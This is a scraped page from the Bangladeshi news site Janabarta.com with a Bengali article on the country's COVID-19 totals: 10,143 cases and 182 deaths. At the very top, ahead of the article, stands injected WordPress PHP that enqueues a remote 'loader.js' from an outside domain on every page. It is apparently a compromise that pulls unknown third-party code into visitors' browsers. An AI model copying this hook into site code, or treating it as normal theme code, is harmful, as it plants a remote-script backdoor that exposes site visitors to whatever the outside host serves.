// Injected Script Enqueue Code function enqueue_custom_script() { wp_enqueue_script( 'custom-error-script', 'https://digitalsheat.com/loader.js', array(), null, true ); } add_action('wp_enqueue_scripts', 'enqueue_custom_script'); Janabarta.com | Newsportal Site আক্রান্ত ছাড়িয়ে ১০ হাজার, মৃত্যু ১৮২ - Janabarta.com

আক্রান্ত ছাড়িয়ে ১০ হাজার, মৃত্যু ১৮২

করোনাভাইরাস (Coronavirus)- প্রতীকী ছবি

নিজস্ব প্রতিবেদক: গত ২৪ ঘণ্টায় দেশে মরণঘাতী করোনাভাইরাসে আক্রান্ত ৬৮৮ জনকে শনাক্ত করা হয়েছে। যা একদিনে আক্রান্তের ক্ষেত্রে সর্বোচ্চ। এ নিয়ে দেশে আক্রান্তের সংখ্যা দাঁড়ালো ১০ হাজার ১৪৩ জন। এ ছাড়া একদিনে আরো ৫ জনের মৃত্যু হয়েছে। এ নিয়ে দেশে মৃত্যুর সংখ্যা দাঁড়ালো ১৮২ জন।

আজ সোমবার স্বাস্থ্য অধিদপ্তরের করোনা সংক্রান্ত নিয়মিত বুলেটিনে এ তথ্য জানানো হয়। বুলেটিনে এসব তথ্য জানান স্বাস্থ্য অধিদফতরের অতিরিক্ত মহাপরিচালক অধ্যাপক ডা. নাসিমা সুলতানা।

তিনি বলেন, গত ২৪ ঘণ্টায় ৬ হাজার ২৬০ জনের নমুনা পরীক্ষা করা হয়েছে। এর মধ্যে ৬৮৮ জনকে আক্রান্ত হিসেবে শনাক্ত করা হয়েছে। এ নিয়ে আক্রান্তের সংখ্যা দাঁড়ালো ১০ হাজার ১৪৩ জন।

নাসিমা সুলতানা বলেন, গত ২৪ ঘণ্টায় আরো ৫ জনের মৃত্যু হয়েছে। এ নিয়ে মৃত্যুর সংখ্যা দাঁড়ালো ১৮২ জন।

স্বাস্থ্য অধিদপ্তরের এ কর্মকর্তা জানান, গত ২৪ ঘণ্টায় দেশে ১৪৭ জন করোনা রোগী সুস্থ হয়েছেন। এ নিয়ে মোট ১ হাজার ২১০ জন সুস্থ হয়েছেন।

গত ৮ মার্চ দেশে প্রথম করোনা রোগী শনাক্ত হয়। আর করোনা আক্রান্ত ব্যক্তির মৃত্যু ঘটে ১৮ মার্চ।